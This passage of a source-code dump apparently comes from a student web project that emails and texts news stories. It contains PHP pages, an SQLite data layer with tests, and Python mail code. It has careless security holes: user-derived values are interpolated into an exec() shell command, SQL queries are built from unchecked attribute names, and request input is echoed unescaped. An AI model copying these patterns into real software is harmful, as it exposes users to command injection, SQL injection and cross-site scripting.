server\\n')\r\n\t\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\t\tdriverlog.write(str(cutted_stories))\r\n\t\t\t\t\tdriverlog.write('\\n')\r\n\t\t\t\t\tdriverlog.flush()\r\n\r\n\t\t\t\tEmailServer.sendStories(cutted_stories)\r\n\t\t\t\ttime.sleep(60)\r\n\t\t\t\tcutted_stories = []\r\n\t\tprint ' ------------------------------------------ '\r\n\t\tprint 'Here is remaining ', str(limiter % 10), ' story passed to email server'\r\n\t\tprint ' ------------------------------------------ '\r\n\t\tif (logs):\r\n\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\tdriverlog.write('Here is remaining ' + str(limiter % 10) + ' story passed to email server\\n')\r\n\t\t\t\tdriverlog.write('--------------------------------------\\n')\r\n\t\t\t\tdriverlog.write(str(cutted_stories))\r\n\t\t\t\tdriverlog.write('\\n')\r\n\t\t\t\tdriverlog.flush()\r\n\t\tEmailServer.sendStories(cutted_stories)\r\n\t\ttime.sleep(60)\r\n\t\tcutted_stories = []\r\n\t\t# print cutted_stories\r\n\tif (logs):\r\n\t\tdriverlog.close()\r\n\t\tstorylog.close()\r\n\r\n\treturn\r\n\r\nif __name__ == \"__main__\":\r\n\tDriver()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Copyright information\r\n\"\"\"\r\nAuthors: CS 130 Watercooler Content Distribution Engine Team\r\nCopyright (c) 2010, CS 130 Watercooler Content Distribution Engine Team\r\nAll rights reserved.\r\n\r\nRedistribution and use in source and binary forms, with or without modification,\r\nare permitted provided that the following conditions are met:\r\n\r\n* Redistributions of source code must retain the above copyright notice,\r\n this list of conditions and the following disclaimer.\r\n* Redistributions in binary form must reproduce the above copyright notice,\r\n this list of conditions and the following disclaimer in the documentation\r\n and/or other materials provided with the distribution.\r\n\r\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'\r\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\r\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\r\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\r\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\r\nSUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\r\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\r\nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\r\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\nPOSSIBILITY OF SUCH DAMAGE.\r\n\"\"\"" }, { "alpha_fraction": 0.6500682234764099, "alphanum_fraction": 0.6637107729911804, "avg_line_length": 44.8125, "blob_id": "4fbaea85b9cd892ba52d2fb6454a3898d874fd74", "content_id": "c0c2102612443935f87901afddf2c7cb95fbe3c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 259, "num_lines": 32, "path": "/www/trunk/success.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\nfunction format($cell)\n{\n $retval = '(' . substr($cell,0,3) . ') ' . substr($cell,3,3) . '-' . substr($cell,6,4); \n return $retval;\n}\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n <div id=\"logo\">\n <fieldset style=\"width:22em;\"><legend>Registration Successful</legend>\n <p style=\"color:navy;\">A confirmation email has been sent to <?= $_REQUEST['email'] ?>. Please follow the link in the email to activate your Watercooler account.</p>\n <p style=\"color:navy;\">In addition, a confirmation text message has been sent to <?php echo format($_REQUEST['cell']) ?>. Enter the pin number in the subject of the text message into the corresponding field in your settings page to activate sms alerts.</p>\n\t<p><a href=\"index.php\">Return to the Watercooler homepage</a></p>\n </fieldset>\n </div>\n </body>\n</html>\n" }, { "alpha_fraction": 0.5860214829444885, "alphanum_fraction": 0.5860214829444885, "avg_line_length": 19.72222137451172, "blob_id": "dd5403530b8bc7985c815f5837a661efaeb066c0", "content_id": "53d2007900fbec064bd5dd8728c2fae17e8178ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 372, "license_type": "no_license", "max_line_length": 65, "num_lines": 18, "path": "/www/trunk/unsubscribe.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('auth.php');\n\nif (isset($_REQUEST['confirm'])) {\n if (isset($user)) {\n $user->delete();\n?>\nuser deleted <a href=\".\">home</a>\n<?php\n }\n} else {\n?>\n<form action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" method=\"POST\">\n <label>Are you sure you want to DELETE your account??</label>\n <input type=\"submit\" name=\"confirm\" value=\"YES\" />\n</form>\n<?php\n}" }, { "alpha_fraction": 0.6433260440826416, "alphanum_fraction": 0.6477023959159851, "avg_line_length": 40.54545593261719, "blob_id": "818e94e50415e309735d36f4449b780d88669286", "content_id": "375b32a28965bf0ada7a46b8a72c410d0843fa87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 457, "license_type": "no_license", "max_line_length": 162, "num_lines": 11, "path": "/www/trunk/sendConfirmation.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('common.php');\nrequire_once('db_init.php');\n\n// XXX add authentication to this\n$user = User::find('id', $_REQUEST['id']);\nif ($user !== NULL && !$user->email_confirmed) {\n $hyperlink = 'confirm.php' . \"?id={$user->id}&pin={$user->email_pin}\";\n $confirmationString = \"python2.5 -c \\\"import EmailServer; EmailServer.sendConfirmEmail('{$page_uri_base}{$hyperlink}','{$user->username}','{$user->email}');\\\"\";\n exec($confirmationString);\n}\n" }, { "alpha_fraction": 0.648307204246521, "alphanum_fraction": 0.6506248712539673, "avg_line_length": 34.83876037597656, "blob_id": "19c8d56c20639636a5df0d02fb3f7d489b7d0941", "content_id": "2a198e00297901d435fa9686ffdfd0e9c996ca9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 22005, "license_type": "no_license", "max_line_length": 80, "num_lines": 614, "path": "/www/trunk/db_sqlite.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\n\n/* class SQLiteDBObject provides a base class for all classes which\n represent objects in a SQLite database\n*/\nclass SQLiteDBObject extends DatabaseObject {\n /* $pdo is defined here so sibling classes to SQLiteDB can access its\n PDO and thus perform low-level operations on a given SQLite database */\n protected $pdo;\n\n /* $userattrs_to_cols is an associative array mapping attribute names given \n as a parameter to methods in classes derived from this one to column\n names in the SQLite database. Note that the following attributes are \n missing and require special handling\n 'carrier': column 'cid' needs to be looked up in 'carriors' table by\n 'carrior_name' and entered in user table under column 'cid' */\n protected static $userattrs_to_cols = \n array('username'=>'username',\n\t 'email'=>'email',\n\t 'password'=>'password',\n\t 'phone_number'=>'phone_number');\n}\n\n/* class SQLiteDB implements iDatabase on SQLite databases (see\n corresponding documentation)\n*/\nclass SQLiteDB extends SQLiteDBObject implements iDatabase {\n/* string SQLiteDB::cfg_ini_main_section is the name of the section in \n the ini config files passed to SQLiteDB::connectFromIni containing the\n main connection parameters. This is also the base prefix for the opts ini \n section which is named SQLiteDB::cfg_ini_main_section.' opts'.\n*/\n const cfg_ini_main_section = __CLASS__;\n\n/* function SQLiteDB::__construct is the constructor for the class\n\n $pdo: (PDO object) a valid PDO object connected to the SQLite database to \n use\n*/\n private function __construct(PDO $pdo) {\n $this->pdo = $pdo;\n }\n\n/* function SQLiteDB::setAsSiteDefault implements \n iDatabase::setAsSiteDefault (see corresponding documentation)\n*/\n public function setAsSiteDefault() {\n self::$site_db = $this;\n }\n\n/* function SQLiteDB::connect implements iDatabase::connect (see \n corresponding documentation)\n\n $cfg_vars: (array) the configuration variables for the database connection,\n encoded in the following key-value pairs:\n\t 'filename': (string) the absolute path to the file which contains\n\t the SQLite database (required)\n\t 'opts': (array) an associative array of PDO connection options,\n\t or NULL for PHP defaults (see PHP Manual documentation for PDO\n\t\tand the PDO SQLite driver)\n\n returns a SQLiteDB object connected to the database\n*/\n public static function connect(array $cfg_vars) {\n if (!isset($cfg_vars['filename']))\n\tthrow new InvalidArgumentException('filename is a required key-value '.\n\t\t\t\t\t 'pair in parameter $cfg_vars');\n\n // construct dsn string\n $dsn = 'sqlite:'.$cfg_vars['filename'];\n\n // create PDO object\n $pdo = new PDO($dsn, NULL, NULL, $cfg_vars['opts']);\n\n // set PDO error mode so that we get exceptions instead of PHP errors\n $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n\n $c = __CLASS__;\n $db = new $c($pdo);\n\n return $db;\n }\n\n/* function SQLiteDB::connectFromIni implements iDatabase::connectFromIni\n (see corresponding documentation)\n\n $cfg_file: (string) the ini file to read connection configuration variables\n from, encoded in the var-value pairs listed in the documentation\n\t for SQLiteDB::connect, split into the following sections:\n\t Section 'SQLiteDB' contains\n\t 'username', 'password', 'host', 'port', 'dbname'\n\t Section 'SQLiteDB opts' contains\n\t the PDO connection options, encoded in var-value pairs with the\n\t\tvariable names being names of PDO constants, and the values\n\t\tbeing the desired corresponding values for the options. Note\n\t\tthat values MUST be single quoted to avoid values from being\n\t\tinterpreted by PHP (see PHP Manual documentation for PDO and\n\t\tthe PDO SQLite driver for PDO connection options).\n\n returns a SQLiteDB object connected to the database\n*/\n public static function connectFromIni($cfg_file) {\n $cfg = @parse_ini_file($cfg_file, TRUE);\n if ($cfg === FALSE) {\n $e = error_get_last();\n throw new ErrorException($e['message'], 0, $e['type'], \n\t\t\t $e['file'], $e['line']);\n }\n\n $cfg_vars = $cfg[self::cfg_ini_main_section];\n\n // parse PDO options\n if (isset($cfg[self::cfg_ini_main_section.' opts']))\n foreach ($cfg[self::cfg_ini_main_section.' opts'] as $key=>$value)\n\t$cfg_vars['opts'][constant($key)] = $value;\n\n return self::connect($cfg_vars);\n }\n}\n\n/* class SQLiteUsers implements iUsers on SQLite databases (see corresponding \n documentation)\n*/\nclass SQLiteUsers extends SQLiteDBObject implements iUsers {\n private $db;\n public $users;\n\n private function __construct(array $users, SQLiteDB $db) {\n $this->users = $users;\n $this->db = $db;\n }\n\n private static function __search($userinfo, $op, SQLiteDB $db) {\n static $carrier_attr = 'carrier';\n\n // build SQL query to use to search for users\n $search_sql = 'SELECT uid FROM users WHERE ';\n foreach ($userinfo as $attr=>$values) {\n foreach ((array) $values as $key=>$value) {\n\tif (isset(self::$userattrs_to_cols[$attr]))\n\t $search_sql .= \n\t self::$userattrs_to_cols[$attr].\"=? $op \";\n\telseif($attr === $carrier_attr)\n\t $search_sql .= \n\t \"cid=(SELECT cid FROM carriors WHERE carrior_name=?) $op \";\n }\n }\n // remove trailing op and spaces\n $search_sql = substr($search_sql, 0, -(strlen($op) + 2));\n // add rest of SQL query\n $search_sql .= ';';\n\n // prepare SQL statement\n $search_stmt = $db->pdo->prepare($search_sql);\n\n // create array of column value bindings\n foreach ($userinfo as $attr=>$values)\n foreach ((array) $values as $key=>$value)\n\tif (isset(self::$userattrs_to_cols[$attr]) || $attr === $carrier_attr)\n\t $search_binds[] = $value;\n\n $search_stmt->execute($search_binds);\n // set fetch mode to create instances of SQLiteUser\n $search_stmt->setFetchMode(PDO::FETCH_CLASS, 'SQLiteUser', array($db));\n\n // fetch the result and create a new instance of this class\n $search_result = $search_stmt->fetchAll();\n if ($search_result !== FALSE) {\n $c = __CLASS__;\n return new $c($search_result, $db);\n } else\n return NULL;\n }\n\n/* SQLiteUsers::searchAll implements iUsers::searchAll (see corresponding\n documentation). This function is safe to SQL injection.\n*/\n public static function searchAll($userinfo, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAll($userinfo, $db);\n }\n /* SQLiteUsers::__searchAll is a helper function to SQLiteUsers::searchAll \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAll($userinfo, SQLiteDB $db) {\n return self::__search($userinfo, 'AND', $db);\n }\n\n/* SQLiteUsers::searchAny implements iUsers::searchAny (see corresponding\n documentation). This function is safe to SQL injection.\n*/\n public static function searchAny($userinfo, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAny($userinfo, $db);\n }\n /* SQLiteUsers::__searchAny is a helper function to SQLiteUsers::searchAny \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAny($userinfo, SQLiteDB $db) {\n return self::__search($userinfo, 'OR', $db);\n }\n\n/* SQLiteUsers::merge implements iUsers::merge (see corresponding \n documentation).\n*/\n public function merge($users) {\n return self::__merge($users);\n }\n /* SQLiteUsers::__merge is a helper function to SQLiteUsers::merge which\n performs the actual merge operation. This function was added in order to\n use typehinting on parameter $users.\n */\n public function __merge(SQLiteUsers $users) {\n if ($this->db !== $users->db)\n throw new InvalidArgumentException('$db must match between objects');\n $c = __CLASS__;\n return new $c(array_merge($this->users, $users->users), $this->db);\n }\n}\n\n/* class SQLiteUser implements iUser on SQLite databases (see corresponding \n documentation)\n*/\nclass SQLiteUser extends SQLiteDBObject implements iUser {\n /* $db is the database which contains this user */\n private $db;\n /* $uid is the unique user identifier which is used to access user \n information in the database */\n private $uid;\n\n /* function SQLiteDB::__construct is the constructor for the class\n\n $db: (SQLiteDB object) a valid SQLiteDB object connected to the SQLite\n database to use\n */\n private function __construct(SQLiteDB $db) {\n $this->db = $db;\n }\n\n /* function SQLiteDB::__get is the PHP magic 'get' function for the class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* function SQLiteDB::__set is the PHP magic 'set' function for the class */\n public function __set($name, $value) {\n $this->set(array($name=>$value));\n }\n\n /* parseUserInfo transforms a $userinfo array, in the format taken by many\n iUser functions, into an associative array with keys as database column\n names\n */\n private static function parseUserInfo($userinfo, SQLiteDB $db) {\n static $userinfo_to_cols = \n array('username'=>'username', 'password'=>'password', 'email'=>'email', \n\t 'phone_number'=>'phone_number');\n\n // rename the userinfo keys as database column names\n foreach ($userinfo as $key=>$value)\n if ($userinfo_to_cols[$key] !== NULL)\n\t$db_userinfo[$userinfo_to_cols[$key]] = $value;\n\n // XXX fake unused database fields for now\n $db_userinfo['status'] = 1;\n\n return $db_userinfo;\n }\n\n/* SQLiteUser::find implements iUser::find (see corresponding documentation).\n This function IS vulnerable to SQL injection in parameter $attr.\n*/\n public static function find($attr, $value, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* SQLiteUser::__find is a helper function to SQLiteUser::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, SQLiteDB $db) {\n $find_sql = \"SELECT uid FROM users WHERE $attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n/* SQLiteUser::set implements iUser::set (see corresponding documentation).\n This function IS vulnerable to SQL injection in keys to array parameter \n $userinfo.\n*/\n public function set($userinfo) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $this->db);\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array();\n if (isset($userinfo['carrier']))\n $carrier_bind['carrior_name'] = $userinfo['carrier'];\n\n // build the SQL query to use to update the user\n $update_sql = 'UPDATE users SET ';\n // add column names and values\n foreach ($db_userinfo as $col=>$value)\n $update_sql .= $col.'=:'.$col.', ';\n // add carrier name and value\n if (isset($userinfo['carrier']))\n $update_sql .= $carrier_col.'='.$carrier_sql.', ';\n // remove trailing comma and space\n $update_sql = substr($update_sql, 0, -2);\n // add rest of UPDATE statment\n $update_sql .= ' WHERE uid=:uid;';\n\n // prepare the SQL statement\n $update_stmt = $this->db->pdo->prepare($update_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n $update_stmt->bindValue(':'.$col, $value);\n // bind uid\n $update_stmt->bindParam(':uid', $this->uid);\n \n // execute the SQL statement\n $update_stmt->execute();\n }\n\n/* SQLiteUser::get implements iUser::get (see corresponding documentation).\n This function IS vulnerable to SQL injection in parameter $userattr.\n*/\n public function get($userattrs) {\n static $carrier_attr = 'carrier';\n static $carrier_sql = '(SELECT carrior_name FROM carriors WHERE\n cid=(SELECT cid FROM users WHERE uid=:uid2))';\n\n // build SQL query to use to get user attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($userattrs as $key=>$attr) {\n if (isset(self::$userattrs_to_cols[$attr]))\n\t$get_sql .= self::$userattrs_to_cols[$attr].\" AS $attr, \";\n elseif ($attr === $carrier_attr)\n\t$get_sql .= \"$carrier_sql AS $attr, \";\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM users WHERE uid=:uid;';\n\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':uid', $this->uid);\n\n // bind carrier specific column values\n if (in_array('carrier', $userattrs))\n $get_stmt->bindParam(':uid2', $this->uid);\n \n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n throw new Exception('PDOStatement::fetch failed');\n return $get_result;\n }\n\n/* SQLiteUser::create implements iUser::create (see corresponding \n documentation)\n*/\n public static function create($userinfo, $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($userinfo, $db);\n }\n\n /* SQLiteUser::__create is a helper function to SQLiteUser::create which\n performs the actual create operation. This function was added in order to \n use typehinting on parameter $db.\n */\n private static function __create($userinfo, SQLiteDB $db) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $db);\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array('carrior_name'=>$userinfo['carrier']);\n\n // build the SQL query to use to create the user\n $create_sql = 'INSERT INTO users (';\n // add column names\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= $col.', ';\n $create_sql .= $carrier_col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n // add column values\n $create_sql .= ') VALUES (';\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= ':'.$col.', ';\n $create_sql .= $carrier_sql.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n $create_sql .= ');';\n\n // prepare the SQL statement\n $create_stmt = $db->pdo->prepare($create_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n $create_stmt->bindValue(':'.$col, $value);\n \n // execute the SQL statement\n $create_stmt->execute();\n\n // XXX there is probably a better way to do this\n return SQLiteUser::find('username', $userinfo['username'], $db);\n }\n\n/* SQLiteUser::delete implements iUser::delete (see corresponding \n documentation)\n*/\n public function delete() {\n // build the SQL query to use to delete the user\n static $delete_sql = 'DELETE FROM users WHERE uid=:uid;';\n // prepare the SQL statement\n $delete_stmt = $this->db->pdo->prepare($delete_sql);\n // bind column values\n $delete_stmt->bindValue(':uid', $this->uid);\n // execute the SQL statement\n $delete_stmt->execute();\n\n /* unset $this->uid so that future operations on this SQLiteUser object\n will fail */\n unset ($this->uid);\n }\n}\n\n/* class SQLiteTest contains functions used for unit testing on SQLiteObject\n derived classes\n*/\nclass SQLiteTest {\n public static function testAll() {\n $db = self::testDB();\n self::testUser($db);\n self::testUsers($db);\n }\n\n/* function SQLiteTest::testDB tests the semantics of operations in class \n SQLiteDB. These tests require a file called 'SQLiteDB.sql' containing SQL\n which initializes a valid watercooler SQLite database and an empty writable\n directory called 'test'.\n\n returns an SQLiteDB object connected to a test database\n*/\n public static function testDB() {\n static $db_file = 'test/SQLiteTest.db';\n static $db_sql = 'SQLiteDB.sql';\n static $sqlite3_prog = 'sqlite3';\n static $ini_file = 'test/db_def_cfg.ini';\n static $ini_contents = \"\\\n[SQLiteDB]\nfilename=test/SQLiteTest.db\n\";\n\n // create test SQLite database\n unlink($db_file);\n exec(\"$sqlite3_prog -init $db_sql $db_file\");\n\n // SQLiteDB::connect test\n $db = SQLiteDB::connect(array('filename'=>$db_file));\n if (!($db instanceof SQLiteDB))\n throw new Exception('SQLiteDB::connect test failed');\n\n // SQLiteDB::connectFromIni test\n file_put_contents($ini_file, $ini_contents);\n $db = SQLiteDB::connectFromIni('test/db_def_cfg.ini');\n if (!($db instanceof SQLiteDB))\n throw new Exception('SQLiteDB::connect test failed');\n\n return $db;\n }\n\n public static function testUser(SQLiteDB $db) {\n static $userinfo = array('username'=>'testuser',\n\t\t\t 'password'=>'testpassword',\n\t\t\t 'email'=>'testemail',\n\t\t\t 'phone_number'=>'testphone',\n\t\t\t 'carrier'=>'testcarrier');\n static $userinfo_2 = array('username'=>'testuser2',\n\t\t\t 'password'=>'testpassword2',\n\t\t\t 'email'=>'testemail2',\n\t\t\t 'phone_number'=>'testphone2',\n\t\t\t 'carrier'=>'testcarrier2');\n\n // SQLiteUser::create test\n $user = SQLiteUser::create($userinfo, $db);\n if ($user === NULL)\n throw new Exception('SQLiteUser::create test failed');\n\n // SQLiteUser::find test\n $find_user = SQLiteUser::find('username', $userinfo['username'], $db);\n if ($find_user === NULL)\n throw new Exception('SQLiteUser::find test failed');\n\n // SQLiteUser::delete test\n $user->delete();\n $deleted_user = SQLiteUser::find('username', $userinfo['username'], $db);\n if ($deleted_user !== NULL)\n throw new Exception('SQLiteUser::delete test failed');\n\n // SQLiteUser::get test\n $user = SQLiteUser::create($userinfo, $db);\n $get_userinfo = $user->get(array_keys($userinfo));\n if ($get_userinfo != $userinfo)\n throw new Exception('SQLiteUser::get test failed');\n\n // SQLiteUser::get no-carrier-as-attr test\n $userinfo_nocarrier = $userinfo;\n unset($userinfo_nocarrier['carrier']);\n $get_userinfo_nocarrier = $user->get(array_keys($userinfo_nocarrier));\n if ($get_userinfo_nocarrier != $userinfo_nocarrier)\n throw new Exception('SQLiteUser::get no-carrier-as-attr test failed');\n\n // SQLiteUser::set test\n $user->set($userinfo_2);\n $set_userinfo = $user->get(array_keys($userinfo_2));\n if ($set_userinfo != $userinfo_2)\n throw new Exception('SQLiteUser::set test failed');\n\n // SQLiteUser::set no-carrier-as-attr test\n $userinfo_2_nocarrier = $userinfo_2;\n unset($userinfo_2_nocarrier['carrier']);\n $get_userinfo_2_nocarrier = $user->get(array_keys($userinfo_2_nocarrier));\n if ($get_userinfo_2_nocarrier != $userinfo_2_nocarrier)\n throw new Exception('SQLiteUser::set no-carrier-as-attr test failed');\n\n // SQLiteUser::__get test\n $get_username = $user->get(array('username'));\n if ($user->username !== $get_username['username'])\n throw new Exception('SQLiteUser::__get test failed');\n\n // SQLiteUser::__set test\n $user->username = 'newusername';\n if ($user->username !== 'newusername')\n throw new Exception('SQLiteUser::__set test failed');\n\n $user->delete();\n }\n\n public static function testUsers(SQLiteDB $db) {\n static $userinfo = array('username'=>'testuser',\n\t\t\t 'password'=>'testpassword',\n\t\t\t 'email'=>'testemail',\n\t\t\t 'phone_number'=>'testphone',\n\t\t\t 'carrier'=>'testcarrier');\n static $userinfo_2 = array('username'=>'testuser2',\n\t\t\t 'password'=>'testpassword',\n\t\t\t 'email'=>'testemail2',\n\t\t\t 'phone_number'=>'testphone2',\n\t\t\t 'carrier'=>'testcarrier');\n\n // SQLiteUsers::searchAll test\n $user = SQLiteUser::create($userinfo, $db);\n $user_2 = SQLiteUser::create($userinfo_2, $db);\n $search_users = \n SQLiteUsers::searchAll(array_intersect($userinfo, $userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('SQLiteUsers::searchAll test failed');\n\n // SQLiteUsers::searchAny username test\n $search_users = \n SQLiteUsers::searchAny(array('username'=>\n\t\t\t\t array($userinfo['username'],\n\t\t\t\t\t $userinfo_2['username'])), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('SQLiteUsers::searchAny username test failed');\n\n // SQLiteUsers::searchAll match-one test\n $search_users = \n SQLiteUsers::searchAll(array_diff($userinfo, $userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 1)\n throw new Exception('SQLiteUsers::searchAll match-one test failed');\n\n // SQLiteUsers::searchAny match-one test\n $search_users_2 = \n SQLiteUsers::searchAny(array('username'=>$userinfo_2['username']), $db);\n if ($search_users_2 === NULL || count($search_users_2->users) !== 1)\n throw new Exception('SQLiteUsers::searchAny username match-one test '.\n\t\t\t 'failed');\n\n // SQLiteUsers::merge test\n $merge_users = $search_users->merge($search_users_2);\n if ($merge_users === NULL || count($merge_users->users) !== 2)\n throw new Exception('SQLiteUsers::merge test failed');\n }\n}\n\n//SQLiteTest::testAll();\n" }, { "alpha_fraction": 0.6108005046844482, "alphanum_fraction": 0.6170734763145447, "avg_line_length": 31.58222198486328, "blob_id": "fba090e160a5d08c4eee5c235487cf83cf0d4c75", "content_id": "64bccae7a297d6ae102ee6d4d5e08d57a53c773c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7333, "license_type": "no_license", "max_line_length": 193, "num_lines": 225, "path": "/EmailServer.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\n\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom urlparse import urlparse\n\nimport sys\nimport Database\n\nHOST = {'AT&T':'txt.att.net',\n 'T-Mobile':'tmomail.net',\n 'Verizon':'vtext.com',\n 'SprinT':'messaging.sprintpcs.com'}\n\nSENDER = '[email protected]'\n\ndef sendAsEmail(emailAddr, message):\n \"\"\"(Internal Use) Send email using smtplib\n \n Input is a destination email address and a MIMEMultipart message. This\n function is intended to be used with formatEmail function. However, any\n other function that supples the right input can work.\n \"\"\"\n # Create a SMTP connection. It is assumed that a\n # MTA is set up locally.\n smtpObj = smtplib.SMTP('localhost')\n\n sendlist = []\n sendlist.append(emailAddr)\n\n # TODO: Catch the exceptions.\n smtpObj.sendmail(SENDER, sendlist, message.as_string())\n\ndef sendAsText(phoneNum, provider, subject, body):\n \"\"\"(Internal Use) Send text message (SMS) through email\n \n This function composes the destination address using the following\n format: phone_number@provider_server. If you have AT&T, the destination\n address may be sent like the following: [email protected]. This\n works because major phone provider have servers that delivers email\n messages to user's phone using SMS. \n \"\"\"\n # Create a SMTP connection. It is assumed that a\n # MTA is set up locally.\n smtpObj = smtplib.SMTP('localhost')\n\n # Check that provider provided is one of the hosts we support\n if provider not in HOST:\n print \"We do not support \" + provider + \".\"\n return\n\n # Remove '-' from phone number\n phoneNum = phoneNum.replace(\"-\", \"\")\n\n # Set Email Address\n emailAddr = phoneNum + \"@\" + HOST[provider] \n\n # Construct the message body\n message = MIMEMultipart()\n message['Subject'] = subject\n message['From'] = SENDER\n message['To'] = emailAddr\n message.attach(MIMEText(body, 'plain'))\n\n sendlist = []\n sendlist.append(emailAddr)\n\n # TODO: Catch the exceptions.\n smtpObj.sendmail(SENDER, sendlist, message.as_string()) \n\ndef formatEmail(feed, emailAddr):\n \"\"\"(Internal Use) Compose the an email based a given feed and destination\n \n Returns a MIMEMultiplat message. \n \"\"\"\n \n # Rename variables\n feedURL = feed[0] \n entries_URL = feed[1]\n entries_titles = feed[2]\n entries_contents = feed[3]\n\n # Find the Subject of the Email\n parsed_url = urlparse(feedURL)\n subject = parsed_url.netloc\n\n # Construct the message body\n message = MIMEMultipart()\n message['Subject'] = subject\n message['From'] = SENDER\n message['To'] = emailAddr\n \n # Form an html form of the email body \n body = \"<html><head></head><body>\"\n \n # I assume that there are same number of entries_URL, entries_titles,\n # and entries_contents are the same. \n numEntries = len(entries_URL)\n for index in range(numEntries):\n \n link = \"<a href=\\\"\" + entries_URL[index] + \"\\\">\" + \\\n entries_titles[index] + \"</a>\" \n content = entries_contents[index]\n body += link + \"<br />\" + content\n\n if index < (numEntries - 1):\n body += \"<br /><br />\"\n \n body += \"</body></html>\"\n message.attach(MIMEText(body, \"html\"))\n \n return message\n\ndef sendFeedAsSMS(feed, user):\n 